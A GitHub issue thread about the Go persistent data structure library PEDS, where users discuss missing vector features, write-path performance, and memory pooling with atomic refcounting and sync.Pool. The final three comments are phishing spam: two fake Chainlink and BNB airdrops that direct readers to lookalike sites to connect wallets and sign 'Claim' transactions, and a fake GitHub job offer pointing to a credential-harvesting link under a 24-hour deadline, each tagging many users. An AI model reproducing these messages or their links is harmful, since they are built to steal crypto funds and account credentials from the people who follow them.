### ISSUE TITLE
vector improvement ideas + perf numbers to README?

### ISSUE THREAD

**Issue by fingon** [tobgu/peds#1]
First of all, great library. I think it is the first reasonable looking Golang data structure library that I have seen, as most of the stuff that drowns in locks or is functional is either really inefficient or awkward to use with multiple goroutines at once.

So, on to questions/requests:

-  Insert/Delete would be also nice to have in vector/vectorslice

- why vector slice does not have ToNativeSlice? (it would be more efficient to take vector slice and then ToNativeSlice only parts you are interested about, as opposed to the whole vector)

- any chance of perf benchmarks? the code looks sensible, but I am wondering how much of a hit I will get if I actually use this as opposed to dealing with locking costs + mutable datastructures

(I can guess that O(log32(n)) is heavily involved in some things that are O(1), but I wonder also about constants as well due to memory allocation etc.)

**Comment by tobgu** [comment]
Hi,

Thanks for your comments and questions, some answers:
* Insert/Delete equivalent to the functions implemented on python lists you mean? Could perhaps be included, I've mostly targeted feature compatibility with the corresponding data structures in Go for the MVP that PEDS currently is.
* Should probably be implemented! I have not made a conscious decision to leave it out.
* I'll try to compile a list of benchmarks to put in the README. I expect the read path to be OK perf wise but the write path is probably a fair bit heavier than for the corresponding mutable types. The Go GC is not really optimized for handling the high number of small, short lived, objects that these type of data structures tend to produce when "modifying" them.

**Comment by fingon** [comment]
Yep, I was talking about Python equivalent of e.g. del list[idx] or list[4:4] = [value]. 

Go data structures in general (and slices in particular) are bit too minimalistic for my liking, I have plenty of code that does multiple lines of boring things just to get something that is one line in Python. 

MVPness of PEDS is quite cool. I looked at most of the other ds libraries recently and most of them did not do M or V.. :-p (e.g. 'sure, we have 20 data structures but some of them miss delete, and others have O(n) behavior for half operations. good luck,.')

**Comment by fingon** [comment]
Write path turned out to be prohibitively expensive for what I was doing with the library. At a guess only way this could really work if one used some sort of internal freelist pool, and allowed for slight inefficiency in memory usage. That sounds .. nasty. Sigh.

**Comment by tobgu** [comment]
OK, that's a shame. Do you have any specific benchmarks that you can share? I haven't had time to produce any yet.

I have given some thought to memory management but not really come up with any viable optimizations:
* Free lists: Would basically put the burden on the user to do explicit deallocation of the objects so that they can be returned. Since the nodes may be shared some kind of reference counting would also have to be used which would then have to be protected by locks for thread safety. Doesn't feel like the way to go...
* Allocation of larger blocks of memory (backing arrays) that can then be sliced and used by the nodes. The problem with this approach is that it risks causing memory leaks since the bakcing arrays will stay alive until all slices referencing it have been collected. Since the nodes are shared that wouldn't work either...

I'm happy for more input on this! PR with benchmarks is also welcome! :-)

**Comment by lthibault** [comment]
Hello,

>[ ... ] Since the nodes may be shared some kind of reference counting would also have to be used which would then have to be protected by locks for thread safety.

Surely refcounting can just be done with `atomic.AddUint32`, no?  Something like this:

```go
func (v *privatePersonBySsnItemBucketVector) Free() {
    if atomic.AddUint32(&v.ref, ^uint32(0)) == 0 {
        someGlobalPool.Put(v)
    }
}
```

In the simplest case, `someGlobalPool` could be implemented by a `sync.Pool`.  If we wanted to get fancy, we could implement it as a global PEDS set and a CAS loop.  Thoughts?

Either way +1 for benchmarks.

Thanks for this nice little library!

**Comment by tobgu** [comment]
Hi!

Sure, a `atomic.AddUint32` or similar could probably be used for this! It would still put the burden on the user to free the objects though which is a shame. It may be OK though since it's more of an optimisation than something you would actually have to do.

I like your ideas around the pooling and would be happy taking a PR fleshing it out! (The same goes for benchmarks :-)).

**Comment by lthibault** [comment]
>Sure, a atomic.AddUint32 or similar could probably be used for this! It would still put the burden on the user to free the objects though which is a shame. It may be OK though since it's more of an optimisation than something you would actually have to do.

Good point!  I always tend to forget that `sync.Pool` isn't _really_ manual memory management, and you can always offload the responsibility to the garbage collector.

Also, at the risk of being cheeky, PEDS itself is arguably an optimization!  If users are reaching for this library, its already because they're trading convenience for performance.  It doesn't seem unreasonable to push that tradeoff a bit further, especially if users don't _have_ to use the `Free` method.

>I like your ideas around the pooling and would be happy taking a PR fleshing it out! (The same goes for benchmarks :-)).

I'm currently evaluating PEDS for a project of mine, but I'm not quite at the point where I'm using it.  If/when that day comes, I'm not at all opposed to taking a stab at it, and I'll definitely be in touch for some guidance!

Thanks again for this great work!

**Comment by fahadaltaf123** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @samsonradu, @evanzbitgo, @chaseSpace, @zramsay, @tedvanderveen, @JordyBaylac, @jefmatle

**Comment by softgetix** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @sorokinvld, @Dharshan-K, @derbl4ck, @Runskey, @winain7788, @Preetam007, @WANG-lp

**Comment by Yucao-cy** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
fab2104, @hagishun, @weijiale1, @Neurone, @boozook, @Singer62565658, @xiankevin, @lukemiloszewski, @Aza1, @simonmullaney, @sleeping-barber, @mengguang, @nwt-patrick, @arnau, @wdamron, @matzhouse, @bezalel, @pestrov, @lencyforce, @tuhuiyan
